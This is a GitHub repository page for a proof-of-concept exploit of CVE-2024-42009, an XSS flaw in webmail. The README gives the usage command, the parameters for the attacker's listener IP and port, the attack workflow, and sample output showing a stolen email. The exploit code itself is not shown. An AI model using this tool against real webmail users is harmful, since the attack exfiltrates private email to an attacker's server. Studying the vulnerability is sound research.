Skip to content

Bhanunamikaze/CVE-2024-42009

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit

Overview

This Proof of Concept (PoC) demonstrates an exploit for CVE-2024-42009, leveraging a cross-site scripting (XSS) vulnerability to extract emails from a target webmail application. The attack injects a malicious payload that exfiltrates email content to an attacker-controlled listener.

Features

  • Exploits an XSS vulnerability to capture email contents.
  • Uses an HTTP listener to receive and decode exfiltrated emails.
  • Automates payload injection and exfiltration.

Requirements

  • Python 3.x
  • Required dependencies (install via pip):
    pip install requests beautifulsoup4

Usage

Run the script with the necessary arguments:

python exploit.py -fu attacker@example.com -tu victim@example.com -u http://target.com/contact -ip YOUR_IP -p 1337

Parameters

Argument Description
-fu, --from-user The sender's email address
-tu, --to-user The recipient's email address
-u, --target-url The target webmail URL
-ip, --server-ip The attacker's listener IP address
-p, --server-port The port for the listener (default: 1337)

Attack Workflow

  1. Start Listener: The script starts an HTTP server to capture extracted emails.
  2. Inject Malicious Payload: The XSS payload is sent via a crafted email.
  3. Trigger Execution: When the victim opens the email, the payload executes and sends the email content to the attacker's server.
  4. Capture & Decode: The extracted email content is decoded and displayed.

Example Output

[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!

Disclaimer

I do not claim credit/ownership/disclosure of the vulnerability and all corresponding exploits hosted in this GitHub repo - All Credits to the researcher who discovered it; i just created a POC to replicate the vulnerability based on the data from internet. This PoC is for educational and research purposes only. Unauthorized testing against systems without consent is illegal. Use responsibly!

About

This Proof of Concept (PoC) demonstrates an exploit for CVE-2024-42009, leveraging a cross-site scripting (XSS) vulnerability to extract emails from a target webmail application. The attack injects a malicious payload that exfiltrates email content to an attacker-controlled listener.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages